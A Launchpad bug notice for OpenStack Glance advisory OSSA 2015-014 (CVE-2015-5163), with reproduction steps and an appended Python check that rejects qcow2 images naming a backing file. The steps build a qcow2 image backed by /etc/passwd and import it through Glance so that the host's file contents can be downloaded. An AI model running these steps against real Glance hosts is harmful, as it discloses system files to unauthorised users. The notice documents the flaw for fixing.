** Changed in: ossa
Status: Fix Committed => Fix Released
https://bugs.launchpad.net/bugs/1471912
Title:
  [OSSA 2015-014] Format-guessing and file disclosure via image conversion (CVE-2015-5163)

Status in Glance:
  Fix Committed
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  This is a security flaw that allows files from the Glance host to be
  obtained by a user.

  I'm using the Glance file store and have set in /etc/glance/glance-api.conf:

    [taskflow_executor]
    engine_mode=serial # not sure if needed
    conversion_format=raw

  Make a malicious image available via HTTP.

    $ sudo qemu-img create -f qcow2 /var/www/html/test_image 1M
    $ sudo qemu-img rebase -u -b /etc/passwd /var/www/html/test_image

    $ glance --os-image-api-version 2 task-create --type import --input \
      '{"import_from_format": "qcow2", "import_from": "http://127.0.0.1/test_image",
        "image_properties": {"name": "my_image_test", "disk_format": "qcow2",
        "container_format": "bare"}}'

    $ glance image-download my_image_test --file downloaded_image
    $ head downloaded_image
    <contents from /etc/passwd on the Glance host>

  This happens because Glance runs this command which doesn't specify a format,
  and uses qemu-img's format auto-detection:

    qemu-img convert -O raw file:///tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4 \
      /tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4.converted

  Similar to Cinder bug 1415087.
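
A pre-conversion check for the issue in this report, as an added example that is not part of the original report and is not Glance's own code: it reads the start of the qcow2 header to find a backing file reference and builds a `qemu-img convert` command with the input format pinned by `-f`. The function names, paths and the sample header are assumptions constructed for illustration.

```python
import struct

QCOW2_MAGIC = b"QFI\xfb"
# Start of the qcow2 header, big-endian:
# magic, version, backing_file_offset, backing_file_size
HEADER = struct.Struct(">4sIQI")


def qcow2_backing_file(head: bytes):
    """Return the backing file name a qcow2 header points to, or None.

    `head` is the leading bytes of the uploaded image. Data without the
    qcow2 magic, or with no backing file recorded, returns None.
    """
    if len(head) < HEADER.size:
        return None
    magic, _version, offset, size = HEADER.unpack_from(head)
    if magic != QCOW2_MAGIC or offset == 0 or size == 0:
        return None
    name = head[offset:offset + size]
    if len(name) < size:
        raise ValueError("backing file name lies beyond the bytes supplied")
    return name.decode("utf-8", "replace")


def convert_args(src, dest, declared_format, head):
    """Build a qemu-img convert argv with the input format pinned by -f.

    Hypothetical helper: refuses any image whose header names a backing file.
    """
    backing = qcow2_backing_file(head)
    if backing is not None:
        raise ValueError(f"image references backing file {backing!r}")
    return ["qemu-img", "convert", "-f", declared_format, "-O", "raw", src, dest]


def sample_head(backing: bytes) -> bytes:
    """Constructed sample: 72-byte version 2 header (other fields zeroed),
    followed by the backing file name."""
    hdr = HEADER.pack(QCOW2_MAGIC, 2, 72 if backing else 0, len(backing))
    return hdr.ljust(72, b"\0") + backing


if __name__ == "__main__":
    print(qcow2_backing_file(sample_head(b"/etc/passwd")))
    print(convert_args("/tmp/in", "/tmp/in.converted", "qcow2", sample_head(b"")))
```

The check covers only the backing file field in the header; pinning the format with `-f` is what removes the dependence on qemu-img's auto-detection.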